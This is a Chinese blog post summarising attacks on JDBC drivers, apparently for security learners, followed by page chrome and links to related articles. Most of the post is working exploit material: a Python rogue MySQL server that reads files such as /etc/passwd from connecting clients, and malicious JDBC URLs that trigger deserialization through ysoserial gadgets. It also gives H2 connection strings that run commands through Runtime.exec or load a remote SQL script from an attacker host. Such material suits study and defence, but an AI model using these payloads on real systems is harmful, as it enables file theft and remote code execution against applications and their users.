JDBC漏洞利用总结

最新推荐文章于 2024-05-14 00:39:35 发布
最新推荐文章于 2024-05-14 00:39:35 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: 安全 文章标签: 数据库 java JDBC
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/122076039
版权

文章目录


写点关于jdbc漏洞的利用方法

环境搭建

maven依赖

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>
<dependency>
    <groupId>mysql</groupId>
    <artifactId>mysql-connector-java</artifactId>
    <version>8.0.11</version>
    <scope>runtime</scope>
</dependency>
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.199</version>
</dependency>

java代码

package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class TestJDBC {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "jdbc:mysql://127.0.0.1:13306/demo";
        Connection conn = DriverManager.getConnection(url);
    }
}

JDBC任意文件下载

参考伪造mysql服务实现任意文件下载漏洞

搭建一个mysql伪服务器

# coding=utf-8
# python2
import socket
import logging
logging.basicConfig(level=logging.DEBUG)


def main():
    filename = "/etc/passwd"
    sv = socket.socket()
    sv.bind(("", 13306))
    sv.listen(5)
    conn, address = sv.accept()
    logging.info('Conn from: %r', address)
    conn.sendall(
        "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    conn.recv(9999)
    logging.info("auth okay")
    conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    conn.recv(9999)
    logging.info("want file...")
    want_file = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
    conn.sendall(want_file)
    content = conn.recv(9999)
    logging.info(content)
    conn.close()


if __name__ == '__main__':
    main()

运行

python2 my_mysql.py

运行poc

package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class TestJDBC {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "jdbc:mysql://localhost:13306/mysql?useSSL=false&allowLoadLocalInfile=true&maxAllowedPacket=65535";
        Connection conn = DriverManager.getConnection(url);
    }
}

结果
在这里插入图片描述
这里推荐一个好用的JDBC工具MySQL_Fake_Server,集合了文件下载和发序列化漏洞

JDBC反序列化漏洞

这里使用MySQL_Fake_Server工具
先在config.json中配置ysoserialPath属性

{
    "config":{
        "ysoserialPath":"/Users/ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["CommonsCollections6","open /System/Applications/Calculator.app"]
    }
}

运行MySQL_Fake_Server

python3 sever.py

验证

package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class TestJDBC {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "";
        url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true" +
                "&user=yso_URLDNS_http://yourdns.dnslog.io/";
        url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true" +
                "&user=yso_CommonsCollections6_open /System/Applications/Calculator.app";
        Connection conn = DriverManager.getConnection(url);
    }
}

JDBC命令执行

以前写过一篇关于h2的文章
通过H2 数据库get shell

总结一下两位大佬@Litch1 和 @pyn3rd 的《Make JDBC Attack Brilliant Again》中通过h2数据库进行命令执行的方法

poc如下:

package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class TestJDBC {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "";
        
        url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('open /System/Applications/Calculator.app')\n" +
                "$$\n";
        url = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://evil1.dnslog.ceye.io/h2.sql'";

        Connection conn = DriverManager.getConnection(url);
    }
}
5wimming
关注
专栏目录
[JAVA安全]JDBC反序列化漏洞
snowlyzz的博客
02-04 1569
JDBC反序列化调试分析
追洞小组 | Jdbc反序列化漏洞复现浅析
Ms08067安全实验室
05-10 637
文章来源|MS08067 WEB攻防知识星球本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组目录1、前言+靶场搭建2、漏洞复现3、漏洞分析4、漏...
通过JDBC连接数据库H2
qq_40384579的博客
11-25 1093
&lt;%@page import="java.sql.PreparedStatement"%&gt; &lt;%@page import="java.sql.SQLException"%&gt; &lt;%@page import="java.sql.ResultSet"%&gt; &lt;%@page import="java.sql.Statement"%&g
JDBC的SQL注入漏洞分析和解决
weixin_33924312的博客
03-12 117
1.1.1 SQL注入漏洞分析1.1.2 SQL注入漏洞解决需要采用PreparedStatement对象解决SQL注入漏洞。这个对象将SQL预先进行编译,使用?作为占位符。?所代表内容是SQL所固定。再次传入变量(包含SQL的关键字)。这个时候也不会识别这些关键字。 public class UserDao { public boolean login(String usern...
简单的JDBC反序列化复现
qq_43936524的博客
05-07 4693
文章目录漏洞环境复现代码客户端脚本启动服务器MySQL_Fake_Server服务器 漏洞环境 jdk 1.8.152 需要的依赖库commons-collections 3.1作为本地Gadget JDBC利用采用8.0的版本 <dependencies> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java&l
JDBC的SQL注入漏洞
m0_47649585的博客
08-10 247
使用PreparedStatement对象代替Statement对象执行SQL,该对象可以预编译SQL语句,固定SQL的格式和关键字,用?占位符表示传递的数据,后期设置数据即可。
JDBC SQL注入漏洞
weixin_41796772的博客
03-20 171
JDBC SQL注入漏洞
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2319
Fastjson组件反序列化分析,从基础到RCE的过程笔记
Apache Shiro系列漏洞利用以及实战总结
热门推荐
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
生产漏洞修复总结
duanbiren123的博客
07-08 5426
1、 修复ssh相关漏洞 漏洞列表: OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515) OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) OpenSSH glob表达式拒绝服务漏洞(CVE-2010-4755) OpenSSH J-PAKE授权问题漏洞(CVE-2010-4478) Openssh MaxAu...
Web漏洞利用与安全加固
m0_52231503的博客
04-25 596
漏洞利用 实训准备 安装部署phpStudy+DVWA漏洞演练平台 一、 密码登录绕过 1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。 2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。admin’ or 1=1 --’ 二、 命令注入 1、打开Command Injection界面,在该界面提供一个命令执行环境,输入ip地址返回ping命令的结
网络安全-JDBC反序列化漏洞与RCE
关注网络安全、云原生安全
04-16 3130
可以看到执行语句后,在生成结果集时使用了ResultUtil的resultSetToMap函数,继续点击去,可以看到使用了getObject和readObject,而readObject就在反序列化时自动调用。Y4tacker师傅的脚本会读取a文件,没有的话就使用默认的,也能达到RCE的效果,这个在url中就不必指定user了。这里只需要连接就行,没有安装的话可以使用Java的mysql jdbc包连接也可以。虽然演讲者给出了调用链,但是没有提供恶意服务器,这就需要我们抓包,编写一个假的服务器。
深入探究网络安全:JDBC反序列化漏洞与远程代码执行(RCE)
白帽黑客佳哥的博客
04-23 1030
Java开发环境:安装Java SDK以运行和编译JDBC相关代码。MySQL数据库服务器:用于正常的数据库操作,同时用于攻击演示的Fake MySQL Server。网络抓包工具:如Wireshark,用于捕获和分析MySQL协议数据包。
研究JDBC反序列化漏洞复现
hackzkaq的博客
11-22 402
Java数据库连接,(Java Database Connectivity,简称JDBC),它是java程序与数据库交互的一组API,它提供了一种标准的方法,使Java应用程序能够执行SQL查询、更新数据库记录以及检索和更新结果集。这些API组要位于JDK的java.sql包中。JDBC的引入实现了java程序对数据库的便捷访问,通过使用JDBC,可以将sql语句传给任何一种数据库,不必单独写程序访问不同的数据库。这个JDBC的反序列化漏洞感觉和 shiro 有点类似,是一个不错的反序列化点。
最新polar CTF CB链_cb链 polar wp(3),2024年最新网络安全事件分发机制收藏这一篇就够了
最新发布
2401_84281629的博客
05-14 475
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
从一道题来看JDBC反序列化漏洞([羊城杯-2020]A-Piece-Of-Java)
qq_42585535的博客
04-19 866
本文从一道题目来分析JDBC反序列化漏洞及利用
探探JDBC反序列化漏洞
05-08 1009
更多精彩内容请关注我的同名公众号:程序员启航 漏洞复现 文章开始,先带大家复现JDBC反序列化漏洞 mysql恶意服务启动代码,如下 # -*- coding:utf-8 -*- import socket import binascii import os import sys import subprocess def receive_data(conn): data = conn.recv(1024) return str(data).lower() def send..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值